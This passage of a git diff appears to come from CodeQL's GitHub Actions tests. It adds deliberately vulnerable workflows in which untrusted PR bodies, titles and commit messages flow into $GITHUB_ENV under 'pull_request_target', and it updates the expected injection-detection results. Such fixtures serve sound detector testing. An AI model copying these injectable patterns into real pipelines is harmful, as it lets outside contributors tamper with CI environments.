Uses Step | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | provenance | Config | +| .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | provenance | Config | +| .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | provenance | Config | +| .github/workflows/output2.yml:36:9:41:6 | Uses Step | .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | semmle.label | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml new file mode 100644 index 000000000000..78d288fb9822 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml @@ -0,0 +1,23 @@ +name: publish +on: + pull_request_target: + branches: + - main +jobs: + need-publish: + permissions: + actions: write + name: Need Publish + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + - name: Get commit message + run: | + COMMIT_MESSAGE=$(git log --format=%s) + echo "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV + - name: Get commit message + run: | + echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml new file mode 100644 index 000000000000..93854c5e889f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml @@ -0,0 +1,30 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: changed-files + run: | + echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV" + - run: echo "${{ env.CHANGED-FILES }}" + test2: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: changed-files + run: | + FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/) + echo "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV" + - run: echo "${{ env.CHANGED-FILES }}" + + + diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml new file mode 100644 index 000000000000..89ecd8c0ec3e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml @@ -0,0 +1,29 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - id: title + run: | + echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV" + - run: echo "$TITLE" + test2: + runs-on: ubuntu-latest + steps: + - id: title + run: | + PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH}) + echo "BODY=$PR_BODY" >> "$GITHUB_ENV" + - run: echo "$TITLE" + test3: + runs-on: ubuntu-latest + steps: + - run: | + echo "branch_name=$(jq --raw-output .pull_request.head.ref $GITHUB_EVENT_PATH)" >> $GITHUB_ENV + + + diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml index 05bde57551db..806f8dc8e45c 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml @@ -20,8 +20,6 @@ jobs: contents: write steps: - uses: actions/checkout@v4 - with: - ref: foo - name: Download and Extract Artifacts uses: dawidd6/action-download-artifact@v6 diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected index 7fab238795c6..851aa5241546 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected @@ -1,10 +1,9 @@ edges -| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | | -| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | | -| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | provenance | | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | provenance | | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | -| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | Config | nodes | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | semmle.label | echo $(echo "$PATHINJ") >> $GITHUB_PATH | diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected index ea360bc56df0..5be9f729ad64 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected @@ -1,10 +1,9 @@ edges -| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | | -| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | | -| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | provenance | | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | provenance | | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | -| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | Config | nodes | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | semmle.label | echo $(echo "$PATHINJ") >> $GITHUB_PATH | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 6ad5cf043044..aff785242f9b 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected @@ -1,30 +1,29 @@ edges -| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | -| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | provenance | | -| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | | -| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | | -| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | provenance | | -| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | | -| .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:55:9:61:6 | Uses Step | provenance | | -| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | provenance | Config | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | Config | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | Config | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | provenance | Config | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | Config | +| .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | @@ -58,10 +57,10 @@ nodes | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | semmle.label | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | | .github/workflows/test7.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test7.yml:16:9:24:35 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test8.yml:26:9:32:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | semmle.label | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | -| .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | -| .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | semmle.label | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | semmle.label | Uses Step | @@ -72,6 +71,12 @@ nodes | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:55:9:61:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | +| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | semmle.label | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | +| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | semmle.label | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | +| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | semmle.label | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | semmle.label | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | semmle.label | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | subpaths #select | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | @@ -90,12 +95,18 @@ subpaths | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | | .github/workflows/test7.yml:16:9:24:35 | Uses Step | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Uses Step | -| .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:33:14:35:41 | foo=$(cat 